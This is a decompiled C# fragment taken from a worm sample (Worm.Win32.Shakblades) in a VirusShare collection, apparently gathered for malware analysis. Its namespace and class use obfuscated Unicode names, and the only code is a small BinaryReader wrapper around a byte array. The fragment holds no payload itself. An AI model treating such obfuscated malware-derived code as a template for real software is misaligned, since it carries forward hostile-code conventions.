// Decompiled with JetBrains decompiler // Type: Ҧ߲๒ʽ໙ୄᴘ.ᱠ // Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe using System.IO; namespace Ҧ߲๒ʽ໙ୄᴘ { internal class ᱠ : BinaryReader { public ᱠ(byte[] data) : base((Stream) new MemoryStream(data)) { } } }